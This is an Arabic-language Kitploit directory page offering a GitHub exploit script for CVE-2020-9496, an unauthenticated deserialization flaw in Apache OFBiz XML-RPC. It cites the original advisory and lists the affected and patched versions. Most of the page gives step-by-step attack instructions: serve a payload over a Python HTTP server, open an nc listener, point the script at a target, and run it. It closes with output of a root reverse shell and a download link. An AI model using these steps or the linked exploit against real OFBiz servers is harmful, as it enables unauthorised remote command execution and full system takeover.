Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2020-9496 — نص استغلال لثغرة إلغاء التسلسل غير الآمن CVE-2020-9496 في Apache OFBiz، مما يتيح تنفيذ الأوامر عن بُعد عبر طلبات XML-RPC مصممة خصيصًا مع تسليم حمولة قشرة عكسية. | Kitploit
أدوات/GitHubGitHub/s4dbrd/cve-2020-9496
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأداة الوصول عن بعدتطوير الحمولات
GitHubs4dbrd/cve-2020-9496

CVE-2020-9496

نص استغلال لثغرة إلغاء التسلسل غير الآمن CVE-2020-9496 في Apache OFBiz، مما يتيح تنفيذ الأوامر عن بُعد عبر طلبات XML-RPC مصممة خصيصًا مع تسليم حمولة قشرة عكسية.

عرض المستودع
42منذ 5 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2020-9496

نظرًا لأن الطلبين المرتبطين بـ xmlrpc في webtools (xmlrpc و ping) لا يستخدمان المصادقة، فهما عرضة لإلغاء التسلسل غير الآمن.
تم الإبلاغ عن هذه المشكلة إلى فريق الأمان بواسطة Alvaro Munoz [email protected] من فريق GitHub Security Lab.

الإصدار المتأثر 17.12.01

الإصدارات المُصححة 18.12.01, 17.12.04

المدونة الأصلية: https://securitylab.github.com/advisories/GHSL-2020-069-apache_ofbiz/
منشور Apache: https://issues.apache.org/jira/browse/OFBIZ-11716
إثبات المفهوم من Github: https://github.com/g33xter/CVE-2020-9496

لكي يعمل هذا الاستغلال، ستحتاج إلى تنفيذ الخطوات التالية:

الخطوة 1: استضافة خدمة HTTP باستخدام python3

root@kitploit:~
> sudo python3 -m http.server 80

الخطوة 2: تشغيل مستمع nc على المنفذ المطلوب (يُوصى بـ 8001)

root@kitploit:~
> nc -nlvp 8001

الخطوة 3: تغيير عنوان URL والمنفذ الخاصين بالموقع داخل السكربت:

root@kitploit:~
url='https://127.0.0.1' # CHANGE THIS                                                         
port=8443 # CHANGE THIS

الخطوة 4: تشغيل الاستغلال كما هو موضح أدناه

root@kitploit:~
> ./cve-2020-9496.sh -i IP -p PORT

الخطوة 5: التحقق من مستمع nc

root@kitploit:~
❯ nc -nlvp 8001
listening on [any] 8001 ...
connect to [10.10.x.x] from (UNKNOWN) [10.10.x.x] 57500
bash: cannot set terminal process group (31): Inappropriate ioctl for device
bash: no job control in this shell
root@poc:/usr/src/apache-ofbiz-17.12.01# id
id
uid=0(root) gid=0(root) groups=0(root)
root@poc:/usr/src/apache-ofbiz-17.12.01# 
تنزيل الأداة